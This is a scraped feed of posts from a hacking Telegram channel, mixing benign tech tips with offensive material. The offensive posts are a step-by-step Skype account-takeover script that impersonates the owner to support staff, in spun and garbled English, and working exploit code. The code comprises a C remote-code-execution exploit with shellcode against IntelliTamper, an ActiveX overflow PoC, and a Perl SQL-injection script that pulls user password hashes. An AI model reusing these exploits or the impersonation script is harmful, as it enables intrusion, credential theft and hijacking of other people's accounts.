UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.2K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How to become a hacker ? the basic skills that hackers should master by undercode :
pinterest.com/UnderCodeOfficial

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

πŸ¦‘ From this section, we have really embarked on the road of learning hackers. The first thing to introduce is the basic skills that must be mastered as a junior hacker. Learning this can be done through this The section reads that hackers are not mysterious, and they are easy to learn. In order to ensure that beginners are interested in hackers, this book adopts a cyclical progress, which means that the content of each chapter is independent and comprehensive. Learners can learn only after studying a chapter completely. In the next chapter.

A) 1) Learn a certain amount of English:
γ€€γ€€Learning English is very important for hackers, because most of the materials and tutorials are now in English, and news about hackers also comes from abroad. A vulnerability needs to be discovered from the introduction in Chinese. For about a week, the network administrator has enough time to patch the vulnerability during this time, so when we see the introduction in Chinese, this vulnerability may have long ceased to exist. Therefore, learning hackers must try to read English materials, use English software, and pay attention to well-known foreign network security websites in time.

2) Learn to use basic software:
γ€€γ€€The basic software mentioned here refers to two contents: one is the various commands commonly used by computers on our daily lives, such as ftp, ping, net, etc .; on the other hand, we must learn about hacking tools. Use, which mainly includes port scanners, vulnerability scanners, information interception tools and password cracking tools. Because these softwares have many varieties and different functions, this book will introduce several popular software usage methods later. After mastering the basic principles, learners can choose the ones that are suitable for them or can be found in the second part. "To find software development guidelines and write your own hacking tools.

3) Preliminary understanding of network protocols and working principles: The
γ€€γ€€so-called "initial understanding" is to understand the working principles of the network "in accordance with your own understanding method". Because the protocol involves a lot of knowledge and complexity, if you conduct in-depth research at the beginning, it is bound to Will greatly discourage enthusiasm for learning. Here I suggest that learners get a preliminary understanding of the TCP / IP protocol, especially how the network transmits information when browsing the web, how the client browser applies for "handshake information", how the server "responds to handshake information" and "accepts the request" And other content, this part of the content will be described in detail in later chapters.

4) Familiar with several popular programming languages ​​and scripts:
γ€€γ€€As mentioned above, learners are not required to study in depth here, as long as they can understand the relevant languages ​​and know the results of program execution. It is recommended that learners learn the C language, asp, and cgi scripting languages ​​Initially, and have a basic understanding of the htm hypertext language and php, java, etc., mainly study the "variable" and "array" parts of these languages, because there is an inherent relationship between languages ​​Contact, so long as you are proficient in one of them, other languages ​​can be the same, it is recommended to learn C language and htm hypertext language.
B) 1) Familiar with network applications:
γ€€γ€€Network applications include various server software background programs, such as wuftp, Apache and other server backgrounds; there are various online forums and electronic communities. Conditional learners are better off making their own computers into servers, and then installing and running some forum code. After some experimentation, they will perceptually understand the working principle of the network, which is much easier than relying on theoretical learning. Do more with less!

Written by UnderCode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘hacking skype tutorial by UnderCode :
fb.com/UnderCodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

>Mental faculties

>Skype

>Quick-thinking

>Social Skills (Minimum hard work required)

πŸ¦‘ Process

1) The very first thing you'll want to complete is usually collect the essential info; rather as much as you may get of the bank account anyone are trying to acquire control of. Your proposed info You might want to acquire previous to trying to take this Skype is usually;

2) Full name of the particular person
Documented E-Mail tackle to this Skype
Almost any repayment techniques employed
Sign up date of the Skype
5 acquaintances about the individuals Skype record
Region those is usually coming from
Any E-Mail address that have been listed on the bank account

3) The key bullet-points that you need tend to be; Label, E-mail, Repayment Process in addition to Sign up date that you can generally get away with just by while using calendar year in addition to 5 acquaintances about the individuals Skype record; these include the typical concerns you're inquired to start with although in the event you find some of all of them drastically wrong they are going to preceed to consult anyone the country found in subscription in addition to every other E-Mail address of this particular bank account.

4) Properly contemplating you recognize the title of the particular person or the E-Mail you possibly can simply state any Skype with your two key waste info, generally the repayment process isn't repayment employed if you do not know normally plus the call record talks regarding itself; issues held it's place in a bunch call up subsequently there exists a excellent possibility that person has some of hte people in it on the call record.

5) Right now you could have obtained the details needed, it truly is time and energy to place our own preparing in to steps, at once to the site;

πŸ¦‘6) web page link

Purely get into the login name of the Skype plus the title of your personnel. Right now I'll provide you with a transcript of how the chat will in all probability proceed, basically abide by my recommendations and will also be productive if your entire info is usually proper. Best of luck.

7) Transcript

Daring = Skype |Italics = Me personally

β€œHi I have ignored my private data regarding my Skype bank account! ”

β€œOh, My partner and i see. I’d always be satisfied to assist you with that, May possibly I have your own Skype Label in addition to first title, make sure you? ”

β€œMy Skype title is usually β€˜bob’ in addition to la and orange county bob”

β€œThank anyone.

πŸ¦‘ So that you can assist you We need you to definitely supply the using details:

1) Exactly how does anyone spend? Prior repayment process
2) Precisely what is the e-mail tackle anyone provided from subscription?
3) While does anyone create your own Skype bank account (month/year)
some. Provide us the titles of 5 good friends as part of your acquaintances list”

1) β€œ Never ever settled
2) bob@bob. joe
3) 1/2 calendar year previously
some. Bob1, bob2, bob3, bob4, bob5”

β€œThank anyone. You need to furthermore solution:
1) What title does anyone provide from subscription (first + last)
2) What land does you ultimately choose while in subscription?
3) Provide us virtually any previous email address contact info you may have employed? ”

β€œSure,
1) Robert Chad
2) Great britain
3) Merely bob@bob. joe as i recall”

β€œThank anyone make sure you reset to zero your own private data in this article; link”

β€œI don’t have access to in which mail any longer that’s exactly why I’m getting in contact with you”

β€œWhat can be your new email address contact info? ”

β€œIt’s Bob@bobber. bob”

β€œThank anyone. I have at this point improved your own email address contact info, possibly there is anything else My partner and i will let you with currently? ”

β€œThanks greatly, Zero that’s alright l8rs: )”

Transcript Conclude
Right now this can seem to be a good practice nonetheless it isn't and yes it generally builds up an actual individual interconnection concerning anyone plus the particular person you're talking too, with good signals, good grammar in addition to using recommendations meticulously there is certainly virtually any 99% potential for anyone having this.

Written by UnderCode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ 2020 deadly cve IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
twitter.com/UndercodeNews

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :
IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.

Based on exploit by Koshi (written in Perl). This one should be more
stable. Just for fun and to learn more about win32 exploitation.

by Wojciech Pawlikowski (wojtekp@gmail.com)
/

#include <sys/types.h>
#include <sys/socket.h>

#include <arpa/inet.h>
#include <netinet/in.h>

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 1550
#define NOP 0x90
#define RETADDR 0x7c941EED // jmp esp ntdll.dll

/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */

unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x52\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x6d\x39\x59\x6c\x69"
"\x78\x41\x54\x75\x50\x77\x70\x45\x50\x6c\x4b\x73\x75\x55\x6c\x4e"
"\x6b\x61\x6c\x33\x35\x54\x38\x55\x51\x7a\x4f\x4c\x4b\x70\x4f\x45"
"\x48\x4c\x4b\x33\x6f\x67\x50\x45\x51\x4a\x4b\x43\x79\x6c\x4b\x34"
"\x74\x4c\x4b\x47\x71\x6a\x4e\x64\x71\x6f\x30\x5a\x39\x6e\x4c\x4e"
"\x64\x4f\x30\x30\x74\x45\x57\x79\x51\x6b\x7a\x74\x4d\x37\x71\x5a"
"\x62\x4a\x4b\x5a\x54\x55\x6b\x31\x44\x71\x34\x55\x54\x71\x65\x4b"
"\x55\x6c\x4b\x73\x6f\x61\x34\x45\x51\x78\x6b\x65\x36\x6c\x4b\x36"
"\x6c\x50\x4b\x4e\x6b\x71\x4f\x57\x6c\x35\x51\x38\x6b\x4c\x4b\x77"
"\x6c\x6e\x6b\x77\x71\x6a\x4b\x4c\x49\x71\x4c\x37\x54\x34\x44\x7a"
"\x63\x54\x71\x39\x50\x61\x74\x6c\x4b\x43\x70\x46\x50\x4b\x35\x49"
"\x50\x72\x58\x46\x6c\x6c\x4b\x47\x30\x36\x6c\x6c\x4b\x70\x70\x37"
"\x6c\x4e\x4d\x4c\x4b\x65\x38\x46\x68\x7a\x4b\x64\x49\x4e\x6b\x4f"
"\x70\x6e\x50\x77\x70\x77\x70\x45\x50\x6c\x4b\x70\x68\x37\x4c\x63"
"\x6f\x64\x71\x49\x66\x73\x50\x31\x46\x6e\x69\x59\x68\x4b\x33\x69"
"\x50\x51\x6b\x30\x50\x32\x48\x5a\x4f\x5a\x6e\x69\x70\x45\x30\x33"
"\x58\x4c\x58\x6b\x4e\x4c\x4a\x76\x6e\x66\x37\x6b\x4f\x7a\x47\x30"
"\x6d\x53\x43\x62\x50\x53\x51\x73\x59\x32\x4e\x33\x44\x45\x50\x42";

int
main(void)
{
struct sockaddr_in serv_sin, cli_sin;
int i, sockfd, cli_sock, sock_opt = 1, sin_len;
char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE 100] = { 0 };

sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
perror("socket()");
exit(-1);
}

serv_sin.sin_family = AF_INET;
serv_sin.sin_port = htons(80);
serv_sin.sin_addr.s_addr = INADDR_ANY;

if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
{
perror("setsockopt()");
close(sockfd);
exit(-1);
}

if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
{
perror("bind()");
close(sockfd);
exit(-1);
}

listen(sockfd, 1);
sin_len = sizeof(struct sockaddr);

printf("[*] Waiting for a connection...\n");

while (1)
{
cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
if (cli_sock < 0)
{
perror("accept()");
exit(-1);
}

printf("[ ] Connection from %s:%d\n", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));

read(cli_sock, buf, sizeof(buf) - 1);
overflow = (char *)malloc(BUFSIZE 1);

for (i = 0; i <= 1540; i = 4)
*(long *)&overflow[i] = RETADDR;

for (i = 0; i < 1536; i )
overflow[i] = NOP;

memcpy(overflow 550, shellcode, strlen(shellcode));
memcpy(overflow i 4, "\xe9\x14\xfc\xff\xff", 5); // jmp -1000 - jump to our buffer

i = sprintf(req, "200 HTTP/1.1\r\nDate: 2008-07-24 20:14:31\r\nLocation: ");
memcpy(req i, overflow, strlen(overflow));
memcpy(req i strlen(overflow), "\r\n\r\n", 4);

write(cli_sock, req, strlen(req));

printf("[ ] Exploit sent!\n");

close(cli_sock);
}

close(sockfd);
}

Written by UnderCode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
pinterest.com/undercodeOfficial

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

>var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';

var body1='"></OBJECT>';

var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}


document.write(body buf body1);

Written by UnderCode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Best http proxy list sites:

http://www.proxyserverlist24.top/?m=1

http://www.httptunnel.ge/ProxyListForFree/aspx

http://spys.one/en/http-proxy-list/

https://hidemyna.me/en/proxy-list/

https proxy list sites :

http://free-proxy.cz/fr/

https://www.proxynova.com/proxy-server-list/port-8080/

sock 4+5 proxy sites:

http://www.socksproxylist24.top/?m=

https://www.socks-proxy.net

https://sockslist.net

http://spys.one/en/socks-proxy-list/

http://www.gatherproxy.com/sockslist

https://www.sslproxies.org/

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
twitter.com/UndercodeNews

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

#!/usr/bin/perl use IO::Socket;
print q{
-----------------------------------------------
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhost /arctic/
----------------------------------------------- }; $webpage = $ARGV[0];
$directory = $ARGV[1];
print " -initiating\n";
print "|--modules..OK!\n";
sleep 1;
print "|--premodules..OK!\n";
sleep 1;
print "|--preprocessors..OK!\n";
sleep 1;
print " -opening channel.. OK!\n";
sleep 2;
print "--------------------------------------------\n";
print "~ configuration complete.. OK!\n";
print "~ scanning";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
if (!$webpage) { die "\ rtfm geek\n"; } $wbb_dir =
"http://".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--"; print "~ connecting";
$|=1;
foreach (1..1) {
print ".";
sleep 1;
}
print " OK!\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Server\n"; print "~ open exploiting-tree";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";
print "[ ] Target: $webpage\n";
while ($answer = <$sock>) {
if ($answer =~ /Current Filter: <strong>(.*)<\/strong>/) {
print "exploiting in progress";
$|=1;
foreach (1..3) {
print "...";
sleep 1;
}
print "OK!\n[ ] vuln: OK!\n\n\nwell done, ldma!\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "[ ] USER-ID: -1\n";
print "[ ] ID-HASH: $1\n";
print "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
exit();
}
} close($sock); # ldma

πŸ¦‘TESTED BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How improve android Ram 2020-Speedup 2020 by Undercode:
T.me/UndercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Delete unused widgets (desktop tools) or try to avoid downloading software to the desktop as a shortcut:

2)Android 4.0 operating system , after downloading software by google app , it will automatically download new software to the desktop as a shortcut , which will consume RAM. In addition to deleting the rarely used desktop shortcuts by yourself , you can also remove the " Add icon to home screen " or " Automatically add gadgets " option in the settings of Google PLAY

3) Using the management application tool, view the programs occupying RAM space:

Use the Android phone's own application management tool to delete the less-used programs that occupy RAM space and free up RAM space. Operation method: "Settings"> "Applications"> "Running", and then will occupy large but less RAM The application stopped.

4) Use the phone's built-in software or download management tool to terminate the process and free up memory RAM space:

When the user keeps opening the page , the RAM space is easily occupied. At present, many brands of mobile phones provide tools to free up RAM space (such as the tool manager of SAMSUNG ..) , there are many similar management tools in Google Play (see here for details ) , you can easily close the opened page , free up RAM space Out.


5) Turn on virtual RAM via Swapper and place it on SD memory card

Android phones can use SWAPPER app to put virtual RAM on SD memory card after flashing. However , this will be part of the SD card space as a way of RAM , you must take the risk of brush machine , and a slower reading speed of virtual RAM and easy consumption, hot and let the phone SD reduction in life , basically not recommended.

6) Shut down and re-enable

In order to prevent unnecessary operation from consuming the storage space of the phone , it is recommended that the phone be turned off and on again from time to time.

πŸ¦‘RAM (random access memory) random access memory (memory), which will lose its storage content when power is off, so it is mainly used to store programs used for a short time. The size of the RAM affects the loading speed and smoothness of the game. In addition, the operating system of Android 4.0 and above consumes 340MB of RAM . If the past 512MB of RAM is used , the lack of RAM is prone to cause the phone to run slowly or even crash. At present, most brands use 512MB of RAM for most mid- and low-end mobile phones based on cost considerations . Basically , it is not recommended to upgrade to Android 4.0 or higher operating system version .

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ cvs service-ViewCVS install Howto full by undercode
twitter.com/undercodenews

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

> ViewCVS is a software written in Python to view all data in the CVS code base. It has been used by many configuration management systems, and it is also a CVS auxiliary tool that can be selected in open source products like cvsweb.
Preparations before installation The

following software should already be installed on your system:

1) Python 1.5 or above, this one can also be installed, because ports will determine whether it is installed at compile time, if not installed it will automatically compile and Installed.

2) cvs, cvs is already built in FreeBSD, so don't worry.

3) mysql 3.22 and above, if you need viewcvs to store data into mysql, why should you install this software in advance. Note that this software is not required for viewcvs to run.

πŸ¦‘ Installing ViewCVS

under FreeBSD Installing ViewCVS under FreeBSD is very simple, you can install via ports:

root @ ~ $ cd / usr / ports / devel / viewcvs /
root @ / usr / ports / devel / viewcvs $ make install; make Clean


1) ViewCVS is installed in the viewcvs-version directory in / usr / local (current version is 0.9.2).
Configure basic ViewCVS

2) Copy viewcvs.conf.dist from viewcvs into a copy called viewcvs.conf. This file is the main configuration file used by viewcvs. In this file, you need to set at least the following parameters:
# cvs_roots
# default_root
# rcs_path
# mime_types_file
cvs_roots settings

3) The original settings of cvs_roots in viewcvs.conf are:

cvs_roots =
Development: / home / cvsroot


4) We need to set all cvsroot for viewcvs to display One by one added to the list, the format is [CVSROOT name]: [CVSROOT path], the following is an example of my setting:

cvs_roots =
maven: / home /
cvsd / cvs / maven, hdsite: / home / cvsd / cvs / hdsite,
bsdhowto: / home / cvsd / cvs / bsdhowto


5) Here I set up three CVSRoots for viewcvs to see. Their names are maven, hdsite, bsdhowto. Note that the settings between each CVSRoot separated by commas
default_root

> default_root is used to set the default home page cvsroot project ViewCVS displayed.
rcs_path

6) The original setting of rcs_path in viewcvs.conf is not available:

#rcs_path = / usr / bin /


πŸ¦‘ We can see that it has been commented out. If your rcs command is not in the / usr / bin directory, why not remove the comment? , Change to the path where rcs is located. Under FreeBSD, the default rcs is under / usr / bin, so this setting can be left unchanged.
mime_types_file

has no mime_types_file setting in viewcvs.conf:

#mime_types_file = /usr/local/apache/conf/mime.types


1) We can point it to Apache's mime setting, or we can write a new setting ourselves, I feel It is not used by the web server. It should be a configuration item used when running independently.
Other configuration of ViewCVS

2) In addition to the basic settings, there are other settings that are also useful. Here we will explain some useful settings.
Other settings in [general]

address is used to set the email of the management contact displayed on the page

address = HD


[vhosts] virtual host support

3 ) If you have multiple virtual hosts to use the same cgi, you will find each host Different settings of viewcvs.conf may be required, which is why the setting of vhost is possible in viewcvs.conf. This is the original description of

viewcvs.conf : # vhost1 = glob1, glob2
# vhost2 = glob3, glob4

# [vhost1-section]
# option = value
# [vhost1-othersection]
# option = value
# [vhost2-section]
# option = value


4) can be seen at a glance, use a name for a virtual host, and explain the virtual host The corresponding url. Each virtual host can set all section attributes, and the name of the section plus the name of the virtual host is sufficient. This is an example I set up:

site = site.example.com
site2 = site2.dns exmaple.com

[mavencn-general]
default_root = maven

[bsd-general]
default_root = bsdhowto
5) I set up two virtual hosts: mavencn and bsd Corresponding to site.example.com and site.example2dns.com respectively. The default_root attribute in the general section is set for the two virtual hosts below.

πŸ¦‘ Installation precautions

First of all, you must pay attention to the file and directory permission settings in CVS. You must give the web server running account read permissions. When I use the cvsd service in ports in FreeBSD, I set its umask to 022.

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?
pinterest.com/UnderCodeOfficial

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) When it comes to sensitive information, everyone first thinks of the ID number.

2) What harm will happen if the ID number is leaked? The offenders use it to handle credit cards, report your bank card, intermediary fraud, use your information to commit illegal crimes, etc. The harm in this is really inevitable. Today, I will work with you to read the ID number from the bank card with chip.

πŸ¦‘ Bank card background

!) From a security point of view, the magnetic stripe card has gradually withdrawn from the historical stage. At present, clone cards and stolen brushes that are frequently issued occur on magnetic stripe cards. Because magnetic stripe cards have only three tracks to store information, The bank card generally only needs to obtain the two-track data to complete the cloning of the bank card, and the two-track data can be easily obtained through a credit card reader of tens of yuan.

2) However, changing to a bank card with a chip is too secure. The issuing bank certificate, IC card public certificate, and certification center certificate are public and private keys that guarantee offline bank card transactions. And online transactions are more secure, requiring the UnionPay back office to strictly check the data of each domain in each card.

3) Although IC cards have the aforementioned security features, there is still a risk of obtaining sensitive information. According to the transaction process of the australia Financial Integrated Circuit IC Card specification, people with ulterior motives can use POS to obtain IC card application selection, application initialization, and read application data steps to obtain interactive data. The TLV format application data obtained at this step may contain Cardholder's identification number. Here are the specific steps.

πŸ¦‘What I want to accomplish in the experiment:

1) Mobile phone: Use the SDK provided by the Bluetooth chip manufacturer to develop the Android version of the app "Bluetooth MPOS", and MPOS and APP "Bluetooth MPOS" use Bluetooth for data interaction

2) POS side: write the program in the MPOS microcontroller to complete the IC card data exchange, obtain the cardholder name, card number, and cardholder ID number.

Note: interested in technology can communicate privately

3) After the pairing is completed, execute the "Cardholder Personal Information" button on the collection side

4) After the MPOS terminal interacts with the IC to obtain TLV format data, it finds sensitive information and uploads it to the mobile phone

5) The mobile app analyzes the name, card number, and identity data sent by the POS

The obtained name, card number and ID number are displayed.

πŸ¦‘From the above experiments, the debit card can read out the name, certificate number and card number on a mobile phone and a card reader without the need for Internet connection. But don't worry too much, because the name and ID number are not necessary data in the card, which means that not all cards can read the cardholder's name and ID number. Of course, even the card that can be read out cannot be operated by anyone

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Speed ​​optimization-read and write on memory
instagram.com/undercodetestingcompany

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

Inside the computer, data reading and writing is realized step by step.

1) read the situation: a data to reach the cpu from the outside, you must go through external storage ---> "memory ---" "second-level cache ---" "first-level cache ---" "cpu register ---" participate in calculation .

2) Writing: Generally, the data generated by the CPU is not (and may not be) written to external storage immediately. Then these data are often retained in the cache or memory first, and the write action will not take place until the CPU informs the write.

3) When multiple data are to be read, they are queued. Similarly, when multiple data are to be written, they are also queued.

4) When there are read and write requests at the same time, the CPU must arrange their order.

πŸ¦‘ Examples:

1) The CPU needs to read a piece of data: If the data is not found in the current instruction register, the CPU will look up the L1 cache, if not, it will look at the L2 cache, and then the memory and external storage.

2) After the CPU reads in a piece of data, the memory, L2 cache, and L1 cache all have the data. As data reads increase, the cache becomes full. At this time, a strategy of giving up is needed. First-in-first-out or first-in-first-out method, there is another strategy: the most used data is retained.

3) In this way, there is a lot of data in the cache or memory. When the CPU is looking for data, it also needs a strategy: association (full association, semi-association, partial association). That is, the cache is divided into several relatively independent areas, and the data is searched according to a certain strategy when searching for data, which will be more efficient.

4) When the CPU has data to be "written" to the cache, such data should be preferentially retained until the CPU "write" notification arrives.

5) When the read and write requirements occur at the same time, two situations will occur: read first and then write, and write first and then read.
πŸ¦‘ Both situations must be carefully considered. such as:

1) The data address to be written is exactly the data address to be read. Read first and write later make the old data read. When you need the latest data, an error occurs; write first and read later make the original data overwritten. When you need the original data, read it at this time. The data is also wrong.

2) Although the data address to be written is not the data to be read immediately, its intermediate results are still retained in the cache. This will also produce errors.
This is also called data correlation. Try to avoid (or reduce) data correlation when designing your program. Although the program is compiled to optimize data dependencies.

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Speed ​​optimization-enable hard disk DMA support
fb.com/undercodetesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

DMA support is not enabled after the anonymous system is installed. In order to improve efficiency, you can enable it:

1) /etc/rc.d/rc.local Add a line / sbin / hdparm -d1 -c3 -m16 / dev / hda
If your hard disk supports ATA33, you can add -X66, ATA66 is -X68.

2) For example, ATA66 is: / sbin / hdparm -d1 -X68 -c3 -m16 / dev / hda

3) We can use hdparm -Tt / dev / hda to test the effect before and after joining. The above tests pay attention to the disaster problems that may bring data, please do not use it at will.

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ Well for now tutorials :

> Speed optimization-enable hard disk DMA support

> good BIN WWE NETWORT

>Speed optimization-read and write on memory

> Can you read the ID number from the bank card, do you believe it?
Can you read the ID number from your bank card?

> cvs service-ViewCVS install Howto full by undercode

@UnderCodeTesting - e n j o y